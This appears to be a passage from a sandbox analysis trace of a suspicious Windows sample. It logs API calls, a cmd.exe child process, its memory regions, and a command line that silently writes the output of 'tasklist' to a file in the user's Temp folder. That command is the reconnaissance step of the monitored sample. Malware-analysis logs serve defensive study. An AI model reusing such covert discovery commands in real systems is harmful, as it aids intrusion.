[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x20328c, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203290, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.139] memcpy (in: _Dst=0x134d3a8, _Src=0x203294, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x203298, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x20329c, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032a0, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032a4, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032a8, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032ac, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.140] memcpy (in: _Dst=0x134d3a8, _Src=0x2032b0, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032b4, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032b8, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032bc, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032c0, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032c4, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032c8, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.141] memcpy (in: _Dst=0x134d3a8, _Src=0x2032cc, _Size=0x4 | out: _Dst=0x134d3a8) returned 0x134d3a8
[0670.142] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x233ec0 | out: hHeap=0x1c0000) returned 1
[0670.144] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0670.149] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd9f0
[0670.149] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd9f0, pulNumLanguages=0x134e8a0 | out: pulNumLanguages=0x134e8a0) returned 1
[0670.149] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9f0 | out: hHeap=0x1c0000) returned 1
Thread:
id = 284
os_tid = 0x138
[0669.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.976] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.976] WaitForSingleObjectEx (hHandle=0x218, dwMilliseconds=0x493d0, bAlertable=0) returned 0x0
[0669.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xa9709390, dwHighDateTime=0x1dab599))
[0669.977] WaitForSingleObjectEx (hHandle=0x218, dwMilliseconds=0x2710, bAlertable=0) returned 0x102
[0679.981] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x108fb58 | out: lpSystemTimeAsFileTime=0x108fb58*(dwLowDateTime=0xaf68c650, dwHighDateTime=0x1dab599))
[0679.982] free (_Block=0x3ef040)
[0679.982] FreeLibrary (hLibModule=0x75830000) returned 1
[0679.986] free (_Block=0x403620)
[0679.987] free (_Block=0x3ed680)
[0679.988] WaitForSingleObjectEx (hHandle=0x218, dwMilliseconds=0xffffffff, bAlertable=0)
Process:
id = "35"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x46ffd000"
os_pid = "0x3f8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "30"
os_parent_pid = "0x598"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c tasklist /fo csv >> C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5209
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5210
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 5211
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 5212
start_va = 0x190000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 5213
start_va = 0x4a880000
end_va = 0x4a8d8fff
monitored = 1
entry_point = 0x4a8890b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 5214
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5215
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 5216
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 5217
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5218
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 5219
start_va = 0x7fffffd4000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 5220
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 5221
start_va = 0x50000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 5222
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5223
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5224
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5225
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 5226
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 5227
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 5228
start_va = 0x290000
end_va = 0x2f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5229
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5230
start_va = 0x7fef72d0000
end_va = 0x7fef72d7fff
monitored = 0
entry_point = 0x7fef72d11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 5231
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5232
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5233
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5234
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5235
start_va = 0x300000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 5236
start_va = 0x300000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 5237
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 5238
start_va = 0x150000
end_va = 0x178fff
monitored = 0
entry_point = 0x151010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5239
start_va = 0x490000
end_va = 0x617fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000490000"
filename = ""
Region:
id = 5240
start_va = 0x150000
end_va = 0x178fff
monitored = 0
entry_point = 0x151010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5241
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5242
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5243
start_va = 0x620000
end_va = 0x7a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 5244
start_va = 0x7b0000
end_va = 0x1baffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 5245
start_va = 0x150000
end_va = 0x16ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 5246
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 5247
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 5248
start_va = 0x1bb0000
end_va = 0x1e7efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 257
os_tid = 0x138
[0571.838] GetProcAddress (hModule=0x77b10000, lpProcName="SetConsoleInputExeNameW") returned 0x77b20c80
[0571.838] GetProcessHeap () returned 0x50000
[0571.838] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x4012) returned 0x6aff0
[0571.838] GetProcessHeap () returned 0x50000
[0571.839] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x6aff0 | out: hHeap=0x50000) returned 1
[0571.840] _wcsicmp (_String1="tasklist", _String2=")") returned 75
[0571.840] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14
[0571.840] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14
[0571.840] _wcsicmp (_String1="IF", _String2="tasklist") returned -11
[0571.840] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11
[0571.840] _wcsicmp (_String1="REM", _String2="tasklist") returned -2
[0571.840] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2
[0571.840] GetProcessHeap () returned 0x50000
[0571.840] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xb0) returned 0x69e40
[0571.840] GetProcessHeap () returned 0x50000
[0571.840] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x22) returned 0x64760
[0571.841] GetProcessHeap () returned 0x50000
[0571.841] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x24) returned 0x64790
[0571.841] GetProcessHeap () returned 0x50000
[0571.841] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x38) returned 0x667b0
[0571.846] GetProcessHeap () returned 0x50000
[0571.846] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x6a) returned 0x69f00
[0571.847] GetProcessHeap () returned 0x50000
[0571.847] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x28) returned 0x647c0
[0571.847] _get_osfhandle (_FileHandle=1) returned 0x7
[0571.847] _get_osfhandle (_FileHandle=1) returned 0x7
[0571.847] _get_osfhandle (_FileHandle=1) returned 0x7
[0571.847] GetFileType (hFile=0x7) returned 0x2
[0571.848] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0571.848] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28fb78 | out: lpMode=0x28fb78) returned 1
[0571.848] _dup (_FileHandle=1) returned 3
[0571.850] _close (_FileHandle=1) returned 0
[0571.851] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", _String2="con") returned -53
[0571.853] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x28fb28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54
[0571.854] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 1
[0571.854] _get_osfhandle (_FileHandle=1) returned 0x54
[0571.854] GetFileType (hFile=0x54) returned 0x1
[0571.854] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41
[0571.854] SetFilePointer (in: hFile=0x54, lDistanceToMove=-1, lpDistanceToMoveHigh=0x28fb88*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x28fb88*=0) returned 0x40
[0571.854] ReadFile (in: hFile=0x54, lpBuffer=0x28fb78, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28fb20, lpOverlapped=0x0 | out: lpBuffer=0x28fb78*, lpNumberOfBytesRead=0x28fb20*=0x1, lpOverlapped=0x0) returned 1
[0571.855] GetConsoleTitleW (in: lpConsoleTitle=0x28fbb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0571.856] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16
[0571.856] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15
[0571.856] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16
[0571.856] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24
[0571.856] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17
[0571.856] _wcsicmp (_String1="tasklist", _String2="CD") returned 17
[0571.856] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17
[0571.856] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2
[0571.857] _wcsicmp (_String1="tasklist", _String2="REN") returned 2
[0571.857] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15
[0571.857] _wcsicmp (_String1="tasklist", _String2="SET") returned 1
[0571.857] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4
[0571.857] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16
[0571.857] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8
[0571.857] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4
[0571.857] _wcsicmp (_String1="tasklist", _String2="MD") returned 7
[0571.857] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7
[0571.857] _wcsicmp (_String1="tasklist", _String2="RD") returned 2
[0571.857] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2
[0571.857] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4
[0571.857] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13
[0571.857] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1
[0571.857] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17
[0571.857] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17
[0571.857] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2
[0571.857] _wcsicmp (_String1="tasklist", _String2="VER") returned -2
[0571.857] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2
[0571.857] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15
[0571.857] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1
[0571.857] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15
[0571.857] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8
[0571.857] _wcsicmp (_String1="tasklist", _String2="START") returned 1
[0571.857] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16
[0571.857] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9
[0571.858] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7
[0571.858] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4
[0571.858] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4
[0571.858] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19
[0571.858] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14
[0571.858] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18
[0571.858] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17
[0571.858] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7
[0571.858] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16
[0571.858] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15
[0571.858] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16
[0571.858] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24
[0571.858] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17
[0571.858] _wcsicmp (_String1="tasklist", _String2="CD") returned 17
[0571.858] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17
[0571.858] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2
[0571.858] _wcsicmp (_String1="tasklist", _String2="REN") returned 2
[0571.858] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15
[0571.858] _wcsicmp (_String1="tasklist", _String2="SET") returned 1
[0571.858] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4
[0571.858] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16
[0571.858] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8
[0571.858] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4
[0571.858] _wcsicmp (_String1="tasklist", _String2="MD") returned 7
[0571.858] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7
[0571.858] _wcsicmp (_String1="tasklist", _String2="RD") returned 2
[0571.858] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2
[0571.859] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4
[0571.859] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13
[0571.859] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1
[0571.859] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17
[0571.859] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17
[0571.859] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2
[0571.859] _wcsicmp (_String1="tasklist", _String2="VER") returned -2
[0571.859] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2
[0571.859] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15
[0571.859] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1
[0571.859] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15
[0571.859] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8
[0571.859] _wcsicmp (_String1="tasklist", _String2="START") returned 1
[0571.859] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16
[0571.859] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9
[0571.859] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7
[0571.859] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4
[0571.859] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4
[0571.859] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19
[0571.859] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14
[0571.859] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18
[0571.859] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17
[0571.859] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7
[0571.859] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14
[0571.859] _wcsicmp (_String1="tasklist", _String2="IF") returned 11
[0571.860] _wcsicmp (_String1="tasklist", _String2="REM") returned 2
[0571.860] GetProcessHeap () returned 0x50000
[0571.860] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x218) returned 0x69f80
[0571.860] GetProcessHeap () returned 0x50000
[0571.860] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x36) returned 0x66870
[0571.860] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17
[0571.861] GetProcessHeap () returned 0x50000
[0571.861] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x420) returned 0x6aff0
[0571.861] SetErrorMode (uMode=0x0) returned 0x0
[0571.861] SetErrorMode (uMode=0x1) returned 0x0
[0571.861] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6b000, lpFilePart=0x28f440 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x28f440*="system32") returned 0x13
[0571.861] SetErrorMode (uMode=0x0) returned 0x1
[0571.861] GetProcessHeap () returned 0x50000
[0571.861] RtlReAllocateHeap (Heap=0x50000, Flags=0x0, Ptr=0x6aff0, Size=0x4a) returned 0x6aff0
[0571.861] GetProcessHeap () returned 0x50000
[0571.861] RtlSizeHeap (HeapHandle=0x50000, Flags=0x0, MemoryPointer=0x6aff0) returned 0x4a
[0571.861] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8af360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0571.862] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0571.862] GetProcessHeap () returned 0x50000
[0571.862] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x1ce) returned 0x6a1a0
[0571.862] GetProcessHeap () returned 0x50000
[0571.862] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x38c) returned 0x6b050
[0571.868] GetProcessHeap () returned 0x50000
[0571.868] RtlReAllocateHeap (Heap=0x50000, Flags=0x0, Ptr=0x6b050, Size=0x1d0) returned 0x6b050
[0571.868] GetProcessHeap () returned 0x50000
[0571.868] RtlSizeHeap (HeapHandle=0x50000, Flags=0x0, MemoryPointer=0x6b050) returned 0x1d0
[0571.868] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8af360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0571.868] GetProcessHeap () returned 0x50000
[0571.868] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xe8) returned 0x6a380
[0571.869] GetProcessHeap () returned 0x50000
[0571.869] RtlReAllocateHeap (Heap=0x50000, Flags=0x0, Ptr=0x6a380, Size=0x7e) returned 0x6a380
[0571.869] GetProcessHeap () returned 0x50000
[0571.869] RtlSizeHeap (HeapHandle=0x50000, Flags=0x0, MemoryPointer=0x6a380) returned 0x7e
[0571.870] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0571.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*" (normalized: "c:\\windows\\system32\\tasklist.*"), fInfoLevelId=0x1, lpFindFileData=0x28f1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1b0) returned 0x6a410
[0571.870] GetProcessHeap () returned 0x50000
[0571.870] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x0, Size=0x28) returned 0x647f0
[0571.870] FindClose (in: hFindFile=0x6a410 | out: hFindFile=0x6a410) returned 1
[0571.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM" (normalized: "c:\\windows\\system32\\tasklist.com"), fInfoLevelId=0x1, lpFindFileData=0x28f1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1b0) returned 0xffffffffffffffff
[0571.870] GetLastError () returned 0x2
[0571.870] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE" (normalized: "c:\\windows\\system32\\tasklist.exe"), fInfoLevelId=0x1, lpFindFileData=0x28f1b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f1b0) returned 0x6a410
[0571.870] GetProcessHeap () returned 0x50000
[0571.870] RtlReAllocateHeap (Heap=0x50000, Flags=0x0, Ptr=0x647f0, Size=0x8) returned 0x68620
[0571.870] FindClose (in: hFindFile=0x6a410 | out: hFindFile=0x6a410) returned 1
[0571.870] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0571.871] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0571.871] GetConsoleTitleW (in: lpConsoleTitle=0x28f700, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0571.871] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f4b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f478 | out: lpAttributeList=0x28f4b8, lpSize=0x28f478) returned 1
